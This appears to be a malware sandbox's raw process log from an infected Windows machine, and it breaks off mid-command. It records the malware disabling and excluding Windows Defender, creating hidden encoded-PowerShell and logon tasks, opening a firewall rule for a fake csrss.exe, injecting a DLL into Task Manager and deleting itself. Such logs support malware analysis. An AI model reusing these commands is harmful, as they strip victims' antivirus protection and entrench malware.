"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
"C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqAfqLMsJ" /SC once /ST 01:29:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqAfqLMsJ"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe
"C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\Install.exe
.\Install.exe
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xe30040,0xe3004c,0xe30058
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 2628
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe
"C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXsUHyRfW" /SC once /ST 01:39:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXsUHyRfW"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe
"C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqAfqLMsJ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ndbwepu.exe\" id /mCsite_idWPi 385118 /S" /V1 /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXsUHyRfW"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe\" id /Jysite_idmve 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe id /Jysite_idmve 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 